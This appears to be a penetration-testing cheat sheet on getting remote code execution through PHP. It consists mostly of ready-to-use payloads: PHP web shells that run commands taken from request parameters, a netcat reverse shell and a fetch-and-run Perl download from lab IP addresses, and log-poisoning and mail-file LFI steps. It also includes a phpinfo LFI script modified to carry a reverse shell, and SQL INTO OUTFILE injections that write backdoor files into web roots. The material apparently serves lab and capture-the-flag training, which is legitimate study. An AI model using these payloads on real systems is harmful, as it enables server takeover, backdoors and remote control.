# PHP rce

### PHP SYSTEM/SHELL\_EXEC

```php
<?php echo shell_exec($_GET['cmd']);?>
<?php echo system($_REQUEST['hack']); ?>
<?php system($_GET['hack']); ?>

# RFI
<?php system('nc.exe -v 10.11.0.131 4444 -e cmd.exe'); ?>
```

### FREE BSE wget reverse shell

*Theres no `wget` in BSD! So use `fetch`*

\<?php passthru("mkdir /tmp/temp/ && fetch -qo /tmp/temp/callme.pl <http://10.11.0.69/callme.pl> && perl /tmp/temp/callme.pl");?>'

### Log poisoning LFI RCE

1. Burp inject php code in User-Agent `User-Agent: <?php system($_REQUEST['hack']); ?>`
2. Check logs at `/var/log/httpd-access.log`
3. Use LFI to RCE `10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname`

### PHPINFO LFI RCE

You have LFI and can view phpinfo.php. Upload file is turned on.

![file\_uploads = On](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FTfCqHFXTWGVowhhhzxF2%2Ffile.png?alt=media)

(step 1) `wget` [`https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py`](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py)

(Step 2) Modify payload to include pentest monkey's reverse shell between start and end

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FHTX4ztFOHrFBkBcXVW8s%2Ffile.png?alt=media)

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FSkE8LQsYzm2Uvi1D4vwb%2Ffile.png?alt=media)

If script doesnt work check the comparison operator greater than

At line 203

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FqQg74m3Wfe8RnlMn5Vbz%2Ffile.png?alt=media)

At line 262

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2Fa8zlCnHbjYVEzsv3FHxv%2Ffile.png?alt=media)

(Step 3) Update LFI script url (apply `%00` null byte terminator if needed) - note the double percent variable is `%%00`

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FA4a5WAzvayoqw64bwpaR%2Ffile.png?alt=media)

(Step 4) Start nc listener to catch reverse shell and run python script.&#x20;

`python phpinfolfi.py 10.10.10.84 80 100`

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FQKtiSG1cWCM9l5YhuTfP%2Ffile.png?alt=media)

### LFI RCE using /var/email

See SMTP cheatsheet, send email with file below:

`<?php echo system($_REQUEST['hack']); ?>`

Using burpsuite, execute RCE using the LFI and commands&#x20;

`../var/mail/emailUserName..........&hack=whoami`

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FIQL81g4Dn0PBMvdelBRx%2Ffile.png?alt=media)

### MYSQL Writing PHP reverse shell with wget

```sql
select "<?php shell_exec('wget http://10.10.14.4/php-reverse-shell.php -O shell1.php'); ?> into outfile "/var/www/html/dlexp.php"
```

### SQL Code Execution

```sql
select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php" to upload
```

### SQL Create file using INTO OUTFILE

```sql
10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```